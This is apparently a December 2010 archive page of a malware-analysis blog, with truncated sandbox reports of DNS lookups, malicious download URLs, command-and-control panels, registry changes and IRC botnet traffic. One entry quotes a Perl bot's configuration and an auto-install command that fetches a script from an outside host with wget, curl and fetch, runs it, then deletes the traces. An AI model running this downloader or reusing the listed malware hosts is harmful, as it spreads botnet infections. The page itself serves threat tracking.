Month: December 2010

DNS Lookup Host Name IP Address 0 127.0.0.1 videosalegria.com videosalegria.com 187.17.98.13 UDP Connections Remote IP Address: 127.0.0.1 Port: 1066 Send Datagram: 115 packet(s) of size 1 Recv Datagram: 115 packet(s) of size 1 Download URLs http://187.17.98.13/red.swf (videosalegria.com) Outgoing connection to remote server: videosalegria.com TCP port 80DNS Lookup Host Name IP Address 0 127.0.0.1 www.youtube.com www.youtube.comRead more...

DNS Lookup Host Name IP Address crocusfeerst.com crocusfeerst.com 109.235.48.186 Opened listening TCP connection on port: 21346 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftTihit “Ohyti” = [REG_BINARY, size: 116 bytes] HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerPhishingFilter “Enabled” = [REG_DWORD,Read more...

Panel here : http://213.155.20.163/new/auth.php DNS Lookup Host Name IP Address 213.155.20.163 213.155.20.163 Data posted to URLs http://213.155.20.163/new/stat.php (213.155.20.163) http://213.155.20.163/new/stat.php (213.155.20.163) Outgoing connection to remote server: 213.155.20.163 TCP port 80 Outgoing connection to remote server: 213.155.20.163 TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “ImagePath” = c:windowssystem32mssrv32.exe HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesmsupdate “DisplayName” = MicrosoftRead more...

###################### my $server = “irc.si.leet.la”,”67.205.85.206″; my $port = “7000”; my $channel = “#mojok”; my $owner = “KaKuNg”; my $procname = “usr/sbin/php”; ###################### autoinstall script: ################################################################ #!/usr/bin/perl # # Auto install script by SuWunk # # created: Oktober 2010 # ################################################################ { system(“wget http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;lwp-download http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;curl -O http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;fetch http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;ftp http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;perl ts.txt irc.si.leet.la 7000 mojok KaKuNg;rm -rf *.txt”);Read more...

– DNS Queries: Name Query Type Query Result Successful Protocol irc.123empe123.co.cc DNS_TYPE_A 64.32.29.221 YES udp 64.32.29.221:6667 Nick: [AUT|00|P|90924] Username: XP-0641 Server Pass: pass Joined Channel: ##Galactic## with Password Anti-GaYs Channel Topic for Channel ##Galactic##: “http://www.windowscenter.net/descargas/msn.exe” Now talking in ##Galactic## Topic On: [ ##Galactic## ] [ http://www.windowscenter.net/descargas/msn.exe ] Topic By: [ RooTED[ON] ] Modes On: [Read more...

DNS Lookup Host Name IP Address all4corp.com all4corp.com 76.10.214.62 www.google.com www.google.com 74.125.39.99 Opened listening TCP connection on port: 29790Download URLs http://76.10.214.62/xed/config.bin (all4corp.com) http://74.125.39.99/webhp (www.google.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) http://76.10.214.62/xed/yourbot.exe (all4corp.com) Data posted to URLs http://76.10.214.62/xed/gate.php (all4corp.com) Outgoing connection to remote server: all4corp.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 OutgoingRead more...

DNS Lookup Host Name IP Address get.whitesmoke.com get.whitesmoke.com 63.236.35.30 c0004553.cdn2.cloudfiles.rackspacecloud.com c0004553.cdn2.cloudfiles.rackspacecloud.com 87.248.217.253 Download URLs http://63.236.35.30/offerbox/OfferBoxSetup_FR.exe (get.whitesmoke.com) http://63.236.35.30/WriterTools/WhiteSmokeWriter.exe (get.whitesmoke.com) http://87.248.217.253/WhiteSmokeWriter.exe (c0004553.cdn2.cloudfiles.rackspacecloud.com) Outgoing connection to remote server: get.whitesmoke.com TCP port 80 Outgoing connection to remote server: c0004553.cdn2.cloudfiles.rackspacecloud.com TCP port 80DNS Lookup Host Name IP Address download.bandoo.com download.bandoo.com 207.232.22.25 download.cdn.bandoo.com download.cdn.bandoo.com 212.201.100.171 Download URLs http://207.232.22.25/o/0/r/63/Fun4IMV6.exe (download.bandoo.com) http://212.201.100.171/cdn/o/0/r/63/Fun4IMV6.exe (download.cdn.bandoo.com)Read more...

Remote Host Port Number 77.49.241.194 7000 NICK USA|77509 USER qhvby 0 0 :USA|77509 NICK USA|47927 USER qsypqt 0 0 :USA|47927 PONG :3F52D482 JOIN #rz# rZr NICK USA|52914 USER ojheof 0 0 :USA|52914 PONG :247FE8D7 NICK USA|85862 USER wwpaiu 0 0 :USA|85862 PONG :A2A6394E NICK USA|76343 USER stywtp 0 0 :USA|76343 PONG :A0F1525E NICK USA|01481 USERRead more...

Remote Host Port Number 205.234.223.186 1234 PASS xxx 216.178.38.224 80 216.178.39.11 80 64.208.241.27 80 69.63.189.39 80 NICK NEW-[USA|00|P|16686] USER XP-2777 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|16686] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requested from the remote web server: o http://browseusers.myspace.com/Browse/Browse.aspx o http://www.myspace.com/browse/people o http://www.myspace.com/help/browserunsupported oRead more...

Remote Host Port Number 216.178.38.224 80 63.135.80.46 80 96.17.164.187 80 216.246.77.76 2345 PASS xxx NICK NEW-[USA|00|P|20068] USER XP-7334 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|20068] -ix JOIN #!gf! test PONG 22 MOTD * The data identified by the following URLs was then requested from the remote web server: o http://browseusers.myspace.com/Browse/Browse.aspx o http://www.myspace.com/browse/people o http://www.myspace.com/help/browserunsupported o http://x.myspacecdn.com/modules/splash/static/img/cornersSheet.png oRead more...